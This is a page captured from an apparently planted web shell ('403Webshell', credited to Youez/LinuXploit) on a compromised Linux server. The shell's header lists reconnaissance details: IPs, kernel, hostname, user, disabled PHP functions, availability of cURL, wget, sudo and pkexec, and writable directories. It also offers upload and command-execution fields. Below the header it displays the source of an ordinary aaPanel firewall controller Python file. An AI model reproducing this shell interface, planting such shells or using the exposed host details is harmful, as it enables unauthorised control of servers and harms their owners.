403Webshell
Server IP : 172.67.216.182  /  Your IP : 172.70.189.82
Web Server : Apache
System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64
User : www ( 1000)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/server/panel/class_v2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/server/panel/class_v2/panelFireControllerV2.py
#coding: utf-8
#-------------------------------------------------------------------
# aaPanel
#-------------------------------------------------------------------
# Copyright (c) 2015-2017 aaPanel(www.aapanel.com) All rights reserved.
#-------------------------------------------------------------------
# Author: hezhihong
#-------------------------------------------------------------------

#------------------------------
# 系统安全管理控制器
#------------------------------
import os,sys,public,json,re

class FirewallController:


    def __init__(self):
        pass

    def model(self,args):
        '''
            @name 调用指定项目模型
            @author hezhihong<2024-04-15>
            @param args<dict_obj> {
                mod_name: string<模型名称>
                def_name: string<方法名称>
                data: JSON
            }
        '''
        try: # 表单验证
            if args['mod_name'] in ['base']:
                return_message=public.return_status_code(1000,'wrong call!')
                del return_message['status']
                return public.return_message(-1,0, return_message)
            public.exists_args('def_name,mod_name',args)
            if args['def_name'].find('__') != -1:
                return_message=public.return_status_code(1000,'The called method name cannot contain the "__" character')
                del return_message['status']
                return public.return_message(-1,0, return_message)
            if not re.match(r"^\w+$",args['mod_name']):
                return_message=public.return_status_code(1000,r'The called module name cannot contain characters other than \w')
                del return_message['status']
                return public.return_message(-1,0, return_message)
            if not re.match(r"^\w+$",args['def_name']):
                return_message=public.return_status_code(1000,r'The called module name cannot contain characters other than \w')
                del return_message['status']
                return public.return_message(-1,0, return_message)
        except:
            return public.return_message(-1,0,public.get_error_object())
        # 参数处理
        module_name = args['mod_name'].strip()
        mod_name = "{}Model".format(args['mod_name'].strip())
        def_name = args['def_name'].strip()

        if not hasattr(args,'data'): args.data = {}
        if args.data:
            if isinstance(args.data,str):
                try: # 解析为dict_obj
                    pdata = public.to_dict_obj(json.loads(args.data))
                except:
                    return public.return_message(-1,0,public.get_error_object())
            elif isinstance(args.data,dict):
                pdata = public.to_dict_obj(args.data)
            else:
                pdata = args.data
        else:
            pdata = args

        if isinstance(pdata,dict): pdata =  public.to_dict_obj(pdata)
        pdata.model_index = 'firewall_v22'

        # 前置HOOK
        hook_index = '{}_{}_LAST'.format(mod_name.upper(),def_name.upper())
        hook_result = public.exec_hook(hook_index,pdata)
        if isinstance(hook_result,public.dict_obj):
            pdata = hook_result # 桥接
        elif isinstance(hook_result,dict):
            return public.return_message(-1,0,hook_result) # 响应具体错误信息
        elif isinstance(hook_result,bool):
            if not hook_result: # 直接中断操作
                return_message=public.return_data(False,{},error_msg='Pre-HOOK interrupt operation')
                del return_message['status']
                return public.return_message(-1,0, return_message)

        # 调用处理方法
        # result = run_object(pdata)
        import public.PluginLoader as plugin_loader
        mod_file = '{}/class_v2/firewallModelV2/{}.py'.format(public.get_panel_path(),mod_name)
        plugin_class = plugin_loader.get_module(mod_file)
        plugin_object = getattr(plugin_class,"main")()
        result = getattr(plugin_object,def_name)(pdata)
        if isinstance(result,dict):
            if 'status' in result and result['status'] == False and 'msg' in result:
                if isinstance(result['msg'],str):
                    if result['msg'].find('Traceback ') != -1:
                        raise public.return_message(-1,0, public.PanelError(result['msg']))

        # 后置HOOK
        hook_index = '{}_{}_END'.format(mod_name.upper(),def_name.upper())
        hook_data = public.to_dict_obj({
            'args': pdata,
            'result': result
        })
        hook_result = public.exec_hook(hook_index,hook_data)
        if isinstance(hook_result,dict):
            result = hook_result['result']
        return result



Youez - 2016 - github.com/yon3zu
LinuXploit